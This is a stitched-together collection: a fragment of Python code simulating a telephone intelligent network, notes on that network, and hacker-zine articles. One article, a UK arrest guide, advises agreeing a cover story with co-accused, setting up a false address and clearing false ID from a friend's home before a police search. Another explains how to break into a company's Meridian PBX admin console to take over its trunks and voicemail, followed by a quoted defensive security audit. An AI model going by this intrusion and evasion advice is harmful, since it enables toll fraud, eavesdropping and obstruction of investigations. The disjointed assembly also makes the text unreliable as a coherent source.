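        return Reply(kind, value, self.name)


class ACP:
    def __init__(self, name, translations, gtt):
        self.name = name
        self.translations = translations       # basic-feature numbers, handled locally
        self.gtt = gtt                         # first 6 digits -> (primary, secondary) NCP

    def derive_csg(self, cli: str) -> str:
        digits = "".join(ch for ch in cli if ch.isdigit())
        hits = [p for p in CSG_TABLE if digits.startswith(p)]
        return CSG_TABLE[max(hits, key=len)] if hits else "UNKNOWN"

    def handle_call(self, dialled, cli, when, digit=None) -> Reply:
        number = normalise_dialled(dialled)
        if number in self.translations:        # translation held: no NCP query
            return Reply("ROUTE", self.translations[number], self.name)
        pair = self.gtt.get(number[:6])
        if pair is None:                       # not defined in GTT
            return Reply("FINAL", "VACANT CODE", self.name)
        ncp = next((n for n in pair if n.available), None)  # secondary only if primary is down
        if ncp is None:                        # both mates down: this treatment is an assumption
            return Reply("FINAL", "NETWORK BUSY", self.name)
        q = Qry1(number, self.derive_csg(cli), self.name, ncp.name)
        return ncp.query(q, when, digit)


def build_network():
    plans = {"8003458000": loans_plan}         # plan data duplicated on both mates
    ncp_a, ncp_b = NCP("NCP-A", plans), NCP("NCP-B", plans)
    acp = ACP("ACP-1", {"8001112220": "6001"}, {"800345": (ncp_a, ncp_b)})
    return acp, ncp_a, ncp_b


if __name__ == "__main__":
    acp, ncp_a, _ = build_network()
    monday = datetime(1999, 10, 4, 10, 0)
    print(acp.handle_call("0800 345800", "0171 555 0100", monday, "2"))
    ncp_a.available = False                    # primary NCP lost: mate takes the query
    print(acp.handle_call("0800 345800", "0117 555 0100", monday))
```

The `source` field shows where each decision was taken, which makes the three 'VACANT CODE' paths of Figure 10 (no GTT entry at the ACP, no plan at the NCP) distinguishable in the output.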
Calls Requiring an NSC
----------------------

As not all ACPs are hosts to an NSC, a call which requires an NSC at some point during the call treatment must be set up in two parts. After the QRY1 message, the call is routed to an ACP/HOST, using C7BT in the normal manner, where a voice trunk to the NSC is allocated. This action is termed a 'service assist' if the NSC is required as an intermediate step in the call treatment (SelectLink) or a 'hand-off' if the NSC is required to play an announcement as the final routing conclusion (CourtesyLink).

During a service assist or a hand-off, the ACP/HOST then queries the NCP a second time (QRY2) with details of the NCP and call number used for the QRY1 message. The call treatment now continues with a list of commands being sent from the NCP to the NSC. This could be to play an announcement and collect digits from the caller. NCP/NSC communication takes place via the C7NA links with any digits collected being returned to the NCP to determine the final disposition of the call.

CALL LOGGING
============

In response to a query message from the originating ACP, the NCP returns a billing command instructing the ACP what details to record; the ACP acknowledges receipt of the instructions to the NCP. On answer, the terminating exchange sends a message to the originating ACP giving either 'answer / no charge' or 'answer / charge' depending on which LinkLine (0800/0345) is defined. On call termination, the ACP records the details of the call in an automatic message accounting (AMA) record.

The originating ACP normally controls the call and is responsible for generating an automatic message accounting record. These records are periodically polled by an on-line data collector which validates them before passing them to an off-line charge raising system which calculates call charges in preparation for the production of the service provider's bill.
Where a 'hand-off' has occurred, the ACP/HOST takes over control of the call for supervisory and logging purposes.

OPERATIONS AND MAINTENANCE
==========================

The Multi-Function Operations System (MFOS) is central to the operations and maintenance functions for the DDSN intelligent network. These functions include:

 o On-line access to the ACPs/NCPs/NSCs
 o Alarm Collection and Monitoring
 o Collection and analysis of traffic data
 o Real time Network management

Connection between the multi-function operations system processors, the network elements and the users is achieved using a virtual circuit switch for flexibility.

///// ///// ///// ///// ///// ///// ///// ///// ///// /////

 .
 :
 |
 +-+[ being arrested in the uk ]+---> by bodie <-------------------------------+
 +-+[ D4RKCYDE ]+---> bodi3@usa.net <--------------------------+
 |
 :
 .

NO COMMENT - A DEFENDANT'S GUIDE TO ARREST
Reprinted from booklet by AK Distribution
by Bodie

****** This information is primarily based on the English legal system, although most of the information is valid for other countries including the US ******

GETTING ARRESTED IS NO JOKE

It's a serious business. All convictions add up: eg, if you're arrested 3 times for shoplifting, you stand a good chance of getting sent down. If there's a chance of you getting nicked, get your act together: know what to do in case you're arrested. Unless you enjoy cells, courtrooms and prisons, you owe it to yourself to wise up.

WHEN YOU HAVE BEEN ARRESTED

You have to give the police your NAME, ADDRESS and your DATE OF BIRTH. They also have the right to take your fingerprints and other non-intimate body samples. The Criminal Justice and Public Order Act 1994 has now removed the traditional 'Right to Silence' (from April 10th 1995). However, all this means is that the police/prosecution can point to your refusal to speak to them when the case comes to court, and the court MAY take this as evidence of your guilt.
THE POLICE CAN NOT FORCE YOU TO SPEAK OR MAKE A STATEMENT, WHATEVER THEY SAY TO YOU IN THE STATION. Refusing to speak cannot be used to convict you by itself.

It's yet to be seen how the police will use this change in the law but we reckon the best policy IF YOU WANT TO GET OFF is to REMAIN SILENT. The best place to work out a good defence is afterwards, with your solicitor or witnesses, not under pressure in the hands of the cops. If your refusal to speak comes up in court, the best defence we think is to refuse to speak until your solicitor gets there, then get them to agree your position. You can then say you acted on legal advice.

KEEPING SILENT IS STILL THE BEST THING TO DO IN POLICE CUSTODY.

REMEMBER: ALL CHARGES ADD UP.

Q: WHAT HAPPENS WHEN I GET ARRESTED?

When you are arrested, you will be taken to a police station, you will be asked your name, address and date of birth. Your personal belongings will be taken from you. These are listed on the custody record and usually you will be asked to sign that the list is correct. You should sign immediately below the last item, so the cops can't add something incriminating to the list. You should also refuse to sign for something which isn't yours, or which could be incriminating. You will then be placed in a cell until the police are ready to deal with you.

Q: WHEN CAN I CONTACT A SOLICITOR?

You should be able to ring a solicitor as soon as you've been arrested. Once at the police station it is one of the first things you should do, for two reasons:

1. To have someone know where you are
2. To show the cops you are not going to be a soft target, they may back off a bit.

It is advisable to avoid using the duty solicitor as they are often either crap or hand in glove with the cops. It's worth finding the number of a good solicitor in your area and memorising it. The police are wary of decent solicitors. Also avoid telling your solicitor exactly what happened: this can be sorted out later.
For the time being, tell him you are refusing to speak. Your solicitor can come into the police station while the police interview you: you should refuse to be interviewed unless your solicitor is present.

Q: WHAT IS AN INTERVIEW?

An interview is the police questioning you about the offences they want to charge you with. The interview will usually take place in an interview room in the police station.

An interview is only of benefit to the police. Remember they want to prosecute you for whatever charges they can stick on you.

THE INTERVIEW IS A NO WIN SITUATION. For your benefit the only thing to be said in an interview is 'No Comment'.

Remember: THEY CAN'T LEGALLY FORCE YOU TO SPEAK

Q: WHY DO THE POLICE WANT ME TO ANSWER QUESTIONS?

IF THE POLICE THINK THEY HAVE ENOUGH EVIDENCE AGAINST YOU THEY WILL NOT NEED TO INTERVIEW YOU. eg, in most public order arrests they rely on witness statements from 1 or 2 cops or bystanders, you won't even be interviewed.

The police want to convict as many people as possible because:

1. They want to convict you because it makes it look like they're doing a good job at solving crime. The 'clear-up rate' is very important to the cops, they have to be seen to be doing their job. The more crimes they get convictions for, the better it looks for them.

2. Police officers want promotion, to climb the ladder of hierarchy. Coppers get promotion through the number of crimes they 'solve'. No copper wants to be a bobby all their life.

A 'solved crime' is a conviction against somebody. You only have to look at such cases as the Birmingham 6 to understand how far the police will go to get a conviction. Fitting people up to boost the 'clear-up rate' and at the same time removing people the cops don't like is a widespread part of all police forces.

Q: SO IF THE POLICE WANT TO INTERVIEW ME, IT SHOWS I COULD BE IN A GOOD POSITION?
Yes, they may not have enough evidence, and hope you'll implicate yourself or other people.

Q: AND THE WAY TO STAY IN THAT POSITION IS TO REFUSE TO BE DRAWN INTO A CONVERSATION AND ANSWER "NO COMMENT" TO ANY QUESTIONS?

Exactly.

Q: BUT WHAT IF THE EVIDENCE LOOKS LIKE THEY HAVE GOT SOMETHING ON ME? WOULDN'T IT BE BEST TO EXPLAIN AWAY THE CIRCUMSTANCES I WAS ARRESTED IN, SO THEY'LL LET ME GO?

The only evidence that matters is the evidence presented in court to the magistrate or judge. The only place to explain everything is in court. If they've decided to keep you in, no amount of explaining will get you out. If the police have enough evidence, anything you say can only add to the evidence against you.

When the cops interview someone, they do all they can to confuse and intimidate you. The questions may not be related to the crime. Their aim is to soften you up, get you chatting. Don't answer a few small talk questions and then clam up when they ask you a question about the crime. It looks worse in court.

To prosecute you, the police must present their evidence to the Crown Prosecution Service. A copy of the evidence will be sent to your solicitor. The evidence usually rests on very small points: this is why it's important not to give anything away in custody. If they don't have enough evidence the case could be thrown out of court or never even get to court. This is why they want you to speak. They need all the evidence they can get. One word could cause you a lot of trouble.

Q: SO I'VE GOT TO KEEP MY MOUTH SHUT. WHAT TRICKS CAN I EXPECT THE POLICE TO PULL IN ORDER TO MAKE ME TALK?

The police try to get people to talk in many devious ways. The following four pages show some pretty common examples, but remember they may try some other line on you.

THESE ARE THINGS THAT OFTEN CATCH PEOPLE OUT
DON'T GET CAUGHT OUT

1: "Come on now, we know it's you, your mate's in the next cell and he's told us the whole story" (If they've got the story, why do they need your confession?
Playing co-accused off against each other is a common trick as you have no way of checking what the other person is saying. If you are up to something dodgy with other people, work out a story and stick to it. Plus you can't be convicted just on the word of a co-accused.)

2: "We know it's not you, but we know you know who's done it. Come on Jane, don't be silly, tell us who done it"

---

(The cops will use your first name to try and seem as though they're your friends. If you are young they will act in a fatherly/motherly way, etc.)

3: "As soon as we find out what happened you can go" (Fat chance)

4: "Look you little bastard. Don't fuck us about. We've dealt with some characters, a little runt like you is nothing to us. We know you did it, you little shit and you're going to tell us"

5: "What's a nice kid like you doing messed up in a thing like this?" (They're trying to get at you)

6: "We'll keep you in till you tell us" (Unless they charge you with a 'serious offence' they have to release you within 24 hours. Even if you are suspected of a 'serious offence' you have the right to a solicitor after 36 hours, and only a magistrate can order you to be held without charge for longer)

7: "You'll be charged with something far more serious if you don't answer our questions, sonny. You're for the high jump. You're not going to see the light of day for a long time. Start answering our questions cos we're getting sick of you" (Mental intimidation. They're unlikely to charge you with a serious offence that won't stick in court. Don't panic)

8: "My niece is a bit of a rebel"

9: "If someone's granny gets mugged tonight it'll be your fault. Stop wasting our time by not talking" (They're trying to make you feel guilty. Don't fall for it - did you ask to be nicked or interviewed?)

10: Mr Nice: "Hiya, what's it all about then? Sergeant Smith says you're in a bit of trouble. He's a bit wound up with you. You tell me what happened and Smith won't bother you.
He's not the best of our officers, he loses his rag every now and again. So what happened?" (Mr Nice is as devious as Mr Nasty. He or she will offer you a cuppa, cigarettes, a blanket. It's the softly-softly approach. It's bollocks. 'No Comment')

11: "We've been here for half an hour now and you've not said a fucking word. Look you little cunt, some of the CID boys will be down in a minute. They'll have you talking in no time. Talk now or I'll bring them down" (Keep at it, they're getting desperate. They're about to give up. You've got a lot to lose by speaking)

12: "Your girlfriend's outside. Do you want us to arrest her? We'll soon have her gear off for a strip search. I bet she'll tell us. You're making all this happen by being such a prick. Now Talk" (They pick on weak spots, family, friends, etc. Gerry Conlon of the Guildford 4 was told that his mother would be shot by the RUC unless he confessed. Cops sometimes do victimise prisoners' families, but mostly they're bluffing)

13: "You're a fucking loony you! Who'd want you for a mother, you daft bitch? Confess or your kids are going into care"

14: "Look, we've tried to contact your solicitor, but we can't get hold of them. It's going to drag on for ages this way. Why don't you use one of our duty solicitors, and we'll soon get this situation cleared up so you can go home" (Never accept an interview without your solicitor present, and don't make a statement even if your solicitor advises you to - a good one won't)

15: "You're obviously no dummy. I'll tell you what, we'll do a deal. You admit to one of the charges and we'll drop the other two. You admit to it and we'll recommend to the judge you get a non-custodial sentence, because you've co-operated. How does that sound?" (They're trying to get you to do a deal. There are no deals to be made with the police. This bloke got sent down for not paying a fine. The prisoner he was hand-cuffed to in the prison bus did a deal with the police.
He pleaded guilty to a charge after being promised a non-custodial sentence. The man trusted the police, he was a small-time businessman accused of fraud. When it came to court, the judge gave him two years, the bloke was speechless)

16: "We've been round to the address you gave and the people there say they don't know you. We've checked up on the DSS computer and there's no sign of you. Now come on, tell us who you are. Wasting police time is a very serious offence. Now tell us who you are or you've had it" (If you've sorted out a false address with someone, make sure they're reliable, and everyone in the place knows the name you're using. Stick at it, if you're confident. You can't be charged for wasting police time for not answering questions)

17: "They've abolished the right to silence - you have to tell us everything now, it's the law" (As we said at the beginning, you can still say nothing, there is no obligation to tell the cops anything beyond your name, address and date of birth)

---

If you are nicked on very serious charges, or for serious violence to a police officer, the cops may rough you up or use violence and torture to get a confession (true or false) out of you. Many of the people freed after being fitted up by the West Midlands Serious Crime Squad or coming to light now in Manchester, were physically abused till they admitted to things they hadn't done. If this happens, obviously it's your decision to speak rather than face serious injury, but remember, what you say could land you inside for a long time, even if it's not true. Don't rely on retracting a confession in court - it's hard to back down once you've said something.

In the police station the cops rely on people's naivety. If you are sussed the chances are they'll give up on you. In these examples we have tried to show how they'll needle you to speak. That's why you have to know what to do when you're arrested. The hassle in the copshop, but if you are on the ball, you can get off.
You have to be prepared. We've had a lot of experience with the police and we simply say:

1: Keep calm and cool when arrested (remember you are on their home ground)
2: Get a solicitor
3: Never make a statement
4: Don't get drawn into conversations with the police
5: If they rough you up, see a doctor immediately after being released. Get a written report of all bruising and marking. Remember the officers' names and numbers if possible

Having said nothing in the police station, you can then look at the evidence and work out your alibi, your side of the story.

THIS IS HOW YOU WILL GET OFF

REMEMBER: An interview is a no-win situation. You are not obliged to speak. If the police want to interview you, it shows you're in a good position...

...And the only way to stay in that position is to refuse to be drawn into any conversation and answer "NO COMMENT" to any questions

Q: WHAT CAN I DO IF ONE OF MY FRIENDS IS ARRESTED?

If someone you know is arrested there's a lot you can do to help them from the outside.

1. If you know what name they are using as soon as you think they've been arrested, ring the police station. Ask whether they are being held there and on what charges
2. Inform a decent solicitor
3. Remove anything from the arrested person's house that the police may find interesting: letters, address books, false ID, etc, in case the police raid the place
4. Take food, cigarettes, etc, into the police station for your arrested friend.

BUT don't go in to enquire at the police station to ask about a prisoner if you run the risk of arrest yourself. You'll only get arrested.

The police have been known to lay off a prisoner if they have visible support from the outside. It's solidarity which keeps prisoners in good spirits.

SUPPORT PRISONERS

 .
 :
 |
 +-+[ meridian security audit /switch hacking ]+---> by hybrid <--------------+
 +-+[ D4RKCYDE ]+---> hybrid@dtmf.org <--------+
 |
 :
 .

 . .. ... .......... BL4CKM1LK teleph0nics .......... ... .. .
 . .. ... ..........
http://hybrid.dtmf.org ......... ... .. . Meridian I Switch and Trunk Interception.......... ..... ... . An account of how an ENTIRE companys PBX.......... ..... ... . can be taken over (The hardcore phreak way)....... ..... ... . by hybrid ...... ..... ... . Hi. I'm not going to write a mad big introduction to this article, because I dont feel their is a need for one. All I want to say here is that this article is intended for the more "hardcore" phreak, yes, hardcore phreak, not for lame ass calling card leeching kiddies who call themsleves phreaks. If you are intersted in hacking telephony switches, and you have prior/prefixed knowledge of Meridian, read on.. Through my experience, I've seen alot of meridian admins go through many different and sometimes repetitive lengths to supposidly secure an internal PSTN connected PABX. In this article I'm going to share my knowledge of PBX switch hacking, and enlighten you to the intricate techneques that can be used to "trunk hop" etc. The information provided in this article has been obtained from my own personal accounts of hacking telephony switches, which I'd like to state, I don't participate in anymore. Now, for the sake of timesaving, I'll setup a possible scenario.. Consider the following: o You have stumbled accross a nice Meridian Mail system, which you have already compromised by finding yourself a few boxdes in their. You discover that the Meridian Mail system you have gained access to belongs to a certain telco, and is used for internal communication between emloyees high up in the hierarchial chain. Now, any "normal" phreak would gradually take over the system by finding as many free boxes as possible and hnading them over to friends, or would keep the nice lil' system to themselves as a means of obtaining information about the telco that owns the PBX, via the the means of eavesdroping on used voicemail boxes. 
This is a very primitive form of remote eavesdropping, which this file is not designed to illustrate.

Meridian PBX systems are all administered by a primary system console, which can be remotely accessed by many different protocols. The most popular of which is remote dialup via assigned extensions. If the company's main switch is centrex based, it is likely that the meridian admin console is accessible via IP on the company's intranet. If you manage to gain access to the actual switching component, you are likely to have the following privileges on the meridian based network:

o 100% control over every single inbound/outbound trunk group
o Access to every single voicemail box on the switch
o Access to trunk/group/node administration

Basically, the meridian administration module is designed to make the admin (or whoever has access to it) GOD over the entire system, I say GOD because you could do anything you wanted, as far as your telephony derived imagination extends. OK, enough of this.. I'm just going to stop going on about what if's for the time being, now I'm going to concentrate on the factual based information, and how one would go about accessing such a switch.

The simplest way to find the internal dialup to a meridian switch is to scan the internal extensions which the switch controls. It's generally a good idea to begin scanning network/node extensions such as 00,01,02,03[xx] etc. What you are looking for is a modem carrier, which when you connect should ask you for a singular password, which in most cases is bypassed by hitting control-SD. Once you are in, you should receive the switch's command line prompt, something similar to this:

>

or

SWITCH0>

OMG, I hear you think.. It looks like a DMS switch prompt.. Well, it is, in a funny kind of way. Meridian switches are designed to emulate certain levels of DMS-100 O/S types, so you'll find that many of the BCS leveled commands that you know from DMS will be useful here.
The information that follows has been obtained from public Meridian Mail Administration sources on the net..

/*

Basic Meridian 1 Security Audit
-------------------------------

"Users will go nuts calling a radio station to win a free toaster, taking over all the trunks in your phone system."

An audit of the Meridian 1 telephone system will ensure that every possible "system" precaution has been made to prevent fraud. The first step involves querying data from the system in the form of printouts (or "capturing" the data to a file in a PC). The next step is to analyze the data and confirm the reason for each entry. Please be advised that this procedure is not designed for all "networked" Meridian 1 systems, however, most of the items apply to all systems. Use at your own risk.

PRINTOUTS REQUIRED FOR SECURITY AUDIT:

It is suggested that you "capture" all of the data from these printouts to separate files. This can be accomplished with a PC and communications program. For the BARS LD90 NET printout, try this file. (enclosed in faith10.zip barparse.zip)

------------------------------------------------------------------------------
LD22 CFN     LD22 PWD     LD21 CDB     LD21 RDB     LD21 LTM
LD23 ACD     LD24 DISA    LD20 SCL     LD86 ESN     LD86 RLB
LD86 DMI     LD87 NCTL    LD87 FCAS    LD87 CDP     LD90 NET
LD90 SUM     LD20 TNB     LD22 DNB     LD88 AUB
------------------------------------------------------------------------------

GATHERING DATA FROM LD81
------------------------

List (LST) the following FEAT entries to form an information base on the telephones.

------------------------------------------------------------------------------
NCOS 00 99   CFXA   UNR   TLD   SRE   FRE   FR1   FR2   CUN   CTD
------------------------------------------------------------------------------

DATA BLOCK REVIEW ITEMS
-----------------------

From the printouts, a review of the following areas must be made. Some of the items may or may not be appropriate depending on the applications of the telephone system.
------------------------------------------------------------------------------
CFN - Configuration
    Verify that History File is in use.
------------------------------------------------------------------------------
PWD - Passwords
    Verify that FLTH (failed login attempt threshold) is low enough.
    Verify that PWD1 and PWD2 (passwords) use both alpha and numeric characters and are eight or more characters long.
    Note any LAPW's (limited access passwords) assigned.
    Enable audit trails.
------------------------------------------------------------------------------
CDB - Customer Data Block
    Verify that CFTA (call forward to trunk access code) is set to NO.
    Verify NCOS level of console.
    Verify that NIT1 through NIT4 (or other night numbers) are pointing to valid numbers.
    EXTT prompt should be NO to work in conjunction with trunk route disconnect controls (See RDB)
------------------------------------------------------------------------------
RDB - Trunk Route Data Block
    Verify that every route has a TARG assigned.
    Confirm that FEDC and NEDC are set correctly. ETH is typical, however for maximum security in blocking trunk to trunk connections, set NEDC to ORG and FEDC to JNT
    Confirm that ACCD's are a minimum of four digits long (unless for paging).
    If ESN signaling is active on trunk routes, verify that it needs to be. ESN signaling, if not required, should be avoided.

    NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block
------------------------------------------------------------------------------
ACD - Automatic Call Distribution
    Verify ACD queues and associated NCFW numbers.
    Verify all referenced extensions.
------------------------------------------------------------------------------
DISA - Direct Inward System Access
    Remove DISA if not required. If required, verify that security codes are in use.
------------------------------------------------------------------------------
ESN - Electronic Switched Network
    AC1 is typically "9". If there is an AC2 assigned, verify its use.
    If TOD or ETOD is used - verify what NCOS levels are changed, when they are changed and why they are changed.
    Apply FLEN to your SPNs to insure nobody is ever allowed to be transferred to a partially dialed number, like "Transfer me to 91800"
    Study EQAR (Equal Access Restriction) to insure that users can only follow a "Carrier Access Code" with a zero rather than a one: (1010321-1-414-555-1212 is blocked but 1010321-0-414-555-1212 is allowed with EQAR)
------------------------------------------------------------------------------
NCTL - Network Control
    Use LD81 FEAT PRINT to verify all NCOS being used.
    Does NCOS 0 = FRL 0?
    Does NCOS X always equal FRL X in the NCTL?
    Does FRL 0 have any capabilities? - It should not be able to dial anything.
------------------------------------------------------------------------------
FCAS - Free Call Screening
    Confirm the need to use FCAS and remove it if possible. FCAS is usually a waste of system memory and complicates the system without saving money.
------------------------------------------------------------------------------
DGT (DMI) - Digit Manipulation
    Confirm all numbers referenced in the "insert" section of each DMI table.
------------------------------------------------------------------------------
RLB - BARS Route List Block
    Are any RLB ENTR'S assigned FRL 0 - typically, only the RLB that handles 911 calls should have an FRL 0.
    If DMI is in use, confirm all "inserted" numbers.
------------------------------------------------------------------------------
CDP - BARS Coordinated Dialing Plan
    Are all CDP numbers valid? Check the RLBs they point to and see what the DMI value is. Confirm insertions.
------------------------------------------------------------------------------
NET - ALL - BARS Network Numbers
    Add 000,001,002,003,004,005,006,007,008,009 as SPNs pointing to a route list block that is set to LTER YES. These entries block transfers to "ext. 9000" and similar numbers.
    Point SPN "0" to a RLI with a high FRL, then consider adding new SPNs of 02, 03, 04, 05, 06, 07, 08, 09 to point to a RLI with a lower FRL so that users cannot dial "0", but can dial "0+NPA credit card calls.
    Check FRL of 0, 00, 011 and confirm that each is pointed to separate NET entry requiring a high FRL.
    Remove all off shore NPAs (Like 1-809 Dominican Republic) if possible. Regulations are almost non-existent in some of those areas and they are hot fraud targets.
    Verify blocking 900 and 976 access. Also consider blocking the NXX of your local radio station contest lines. Users will go nuts calling a radio station to win a free toaster, taking over all the trunks in your phone system.
    Restrict the main numbers and DID range within the BARS system. There is no need to call from an outgoing to an incoming line at the same location.
------------------------------------------------------------------------------
TRUNKS
    Confirm that all trunks have TGAR assigned.
    Confirm that all incoming and TIE trunks have class of service SRE assigned. (caution on networked systems)
    Confirm that all trunks have an NCOS of zero.

    NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block
------------------------------------------------------------------------------
SETS-PHONES
    Does every phone have a TGAR of 1 assigned? (This must be checked set by set, TN by TN).
    Can you change every phone that is UNR to CTD? Review LD81 FEAT PRINT to find out the UNR sets. CTD class of service is explained below.
    Confirm that all sets are assigned CLS CFXD?
    Confirm that the NCOS is appropriate on each set.
    In Release 20 or above, removing transfer feature may be appropriate.
    Confirm that all sets CFW digit length is set to the system DN length.

    NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block

    Apply Flexible Trunk to Trunk Connections on the set, and FTOP in the CDB if deemed appropriate. These restrictions are done on a set by set basis and allow or deny the ability to transfer incoming calls out of the facility.
------------------------------------------------------------------------------
VOICE MAIL PORTS
    Each port should be CLS of SRE
    Each port should be NCOS 0 - NCOS 0 must be known to be too low to pass any call
    Each port should be TGAR 1 (all trunk routes must be TARG 1 also)

    NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block

    NOTE: If you are used to your Mail system doing outcalling, you can forget about that working after applying these restrictions.
------------------------------------------------------------------------------

CLASS OF SERVICE AND TRUNK GROUP ACCESS RESTRICTIONS:
-----------------------------------------------------

EXPLANATION OF CLASS OF SERVICE SRE:
------------------------------------

NTP DEFINITION: Allowed to receive calls from the exchange network. Restricted from all dial access to the exchange network. Allowed to access the exchange network through an attendant or an unrestricted telephone only. Essentially, an SRE set can do nothing on its own except dial internal and TIE line extensions. If a trunk is SRE - it will work normally and allow conference calls and transfers.
EXAMPLES OF 'SRE' IN USE:
-------------------------

Voice Mail cannot connect to an outgoing line, but can receive incoming calls.
Callers on the far end of a TIE line cannot call out through your end (for their sake, both ends should be SRE).

EXPLANATION OF CLASS OF SERVICE CTD:
------------------------------------

If a route access code is accessed (if there was no match between the TGAR and TARG), the caller cannot dial 1 or 0 as the leading digits. If the caller makes a "dial 9" BARS call, the NCOS will control the call.

EXPLANATION OF TGAR AND TARG:
-----------------------------

The best restriction is to have all trunk routes TARG'd to 1 and all TNs (including actual trunk TNs) TGAR'd to 1. This will block all access to direct trunk route selection.

BENEFITS OF IMPLEMENTING THESE SECURITY RESTRICTIONS
----------------------------------------------------

No incoming caller will have access to an outside line unless physically transferred or conferenced by an internal party. If voice mail ports are SRE and NCOS 0 and have a TGAR matching the TARG - they will not be able to transfer a call out of the system, regardless of the voice mail system's resident restrictions assigned.

No phone will be able to dial a trunk route access code. Consider allowing telecom staff this ability for testing.

Layered security:
-----------------

If in phone programming, TGAR was overlooked on a phone, the CTD class of service would block the user from dialing a 0 or 1 if they stumble upon a route access code.

If in programming, the CTD class of service was overlooked, both TGAR and NCOS would maintain the restrictions.

If in programming, the NCOS is overlooked, it will default to zero, which is totally restricted if NCTL and RLBs are set up correctly.

Quick Tour of a Simple Meridian 1 BARS Call
-------------------------------------------

Basic Automatic Route Selection. If you dial "9", you are accessing BARS. "9" is the "BARS Access Code"

1. A telephone dials "9" - BARS activates.
2. The telephone calls a number - Example: 1-312-XXX-XXXX
3. The PBX holds the digits while it looks up "1-312" to figure out what Route List to use for processing the call.
4. The Route List determines the possible trunk routes that can be used.
5. The Route List checks the facility restriction level of the telephone and compares it to its own required facility restriction level.
6. The Route List checks to see if any special digit manipulation should be performed.

LD90 NET
--------

The LD90 Network overlay is where area codes and exchanges are defined. If a prefix is not entered into LD90, it cannot be dialed through BARS. Each area code or exchange refers to a "Route List" or RLI which contains the instructions for routing the call.

>ld 90
ESN000
REQ prt
CUST 0
FEAT net
TRAN ac1
TYPE npa
NPA 1312

NPA 1312 <-- This is the network number (prefix)
RLI 11 <-- This is the Route List that the prefix gets instruction from
DENY 976 <-- This is an exchange in NPA 312 that is blocked
SDRR DENY CODES = 1
DMI 0
ITEI NONE

REQ end

LD86 RLB (or RLI)
-----------------

The RLB is a "list" of possible trunk routes that an area code or exchange can be dialed over. Each "ENTR" or list entry contains a trunk route. Each entry also has a "minimum Facility Restriction Level" or "FRL" that must be met before a phone can access that entry. In the following example, the first entry can be accessed by phones whose NCOS equals an FRL of 3 or above. The second entry can only be accessed by phones whose NCOS equals an FRL of 6 or above. Along with the trunk route and the FRL, you can apply specific "digit manipulation" with the DMI entry. The DMI entries are explained here.
>ld 86
ESN000
REQ prt
CUST 0
FEAT rlb
RLI 11

RLI 11
ENTR 0 <-- This is the list's first "Entry Number"
LTER NO
ROUT 15 <-- This is the first choice Trunk Route Number
TOD 0 ON 1 ON 2 ON 3 ON 4 ON 5 ON 6 ON 7 ON
CNV NO
EXP NO
FRL 3 <-- This is the Facility Restriction Level
DMI 10 <-- This is the Digit Manipulation Index Number
FCI 0
FSNI 0
OHQ YES
CBQ YES

ENTR 1 <-- This is the list's second "Entry Number"
LTER NO
ROUT 9 <-- This is the second choice Trunk Route Number
TOD 0 ON 1 ON 2 ON 3 ON 4 ON 5 ON 6 ON 7 ON
CNV NO
EXP YES <-- This is considered the "expensive" choice
FRL 6 <-- Note that the Facility Restriction Level is higher
DMI 0 <-- Note no digit manipulation is required for this trunk route
FCI 0
FSNI 0
OHQ YES
CBQ YES

ISET 2
MFRL 3

REQ end

LD87 NCTL
---------

The FRL to NCOS "relationship" is built in the NCTL data block. The FRL and the NCOS do not necessarily have to equal one another, however they usually do. A higher FRL/NCOS has more capability than a lower FRL/NCOS. For an NCOS number to have any capability, it must first be defined in the NCTL data block.

>ld 87
ESN000
REQ prt
CUST 0
FEAT nctl
NRNG 0 7 <-- Range from NCOS 0 through 7 was requested
SOHQ NO
SCBQ YES
CBTL 10
---------------
NCOS 0
EQA NO
FRL 0
RWTA NO
NSC NO
OHQ NO
CBQ NO
MPRI 0
PROM 0
---------------
NCOS 1
EQA NO
FRL 1
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT I
RADT 0
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 2
EQA NO
FRL 0
RWTA NO
NSC NO
OHQ NO
CBQ NO
MPRI 0
PROM 0
---------------
NCOS 3
EQA NO
FRL 3 <-- NCOS 3 equals FRL 3.
RWTA YES
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT I
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 4
EQA NO
FRL 4
RWTA YES
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 5
EQA NO
FRL 5
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 10
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 6
EQA NO
FRL 6 <-- NCOS 6 equals FRL 6.
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 0
SPRI 0
MPRI 0
PROM 0
---------------
NCOS 7
EQA NO
FRL 7
RWTA NO
NSC NO
OHQ NO
CBQ YES
RETT 10
RETC 5
ROUT A
RADT 0
SPRI 0
MPRI 0
PROM 0

TOHQ NONE

LD86 Digit Manipulation
-----------------------

The Digit Manipulation data blocks are where special prefixes are entered before numbers are sent out over trunks. An example of digit manipulation is where a 1010XXX carrier access code must be inserted before a number is processed over a trunk.

REQ prt
CUST 0
FEAT dgt
DMI 10

DMI 10 <-- This is simply the index number.
DEL 1 <-- This says "delete the first digit after "9"
CTYP NCHG

REQ prt
CUST 0
FEAT dgt
DMI 3

DMI 3
DEL 0 <-- This says "delete nothing after 9"
INST 101288 <-- This says "Insert 101288 after 9 and before the actual number dialed"
CTYP NCHG

REQ end

Telephone
---------

This is simply a telephone's data block

DES 5135
TN 004 0 14 00
TYPE 500
CDEN 4D
CUST 0
DN 5135 MARP
CPND
NAME Typical User
XPLN 9
DISPLAY_FMT FIRST,LAST
AST NO
IAPG 0
HUNT
TGAR 1
LDN NO
NCOS 5 <-- What FRL does this equal?
SGRP 0
RNPG 0
LNRS 16
XLST
SCI 0
CLS CTD DTN FBD XFA WTA THFD FND HTD ONS
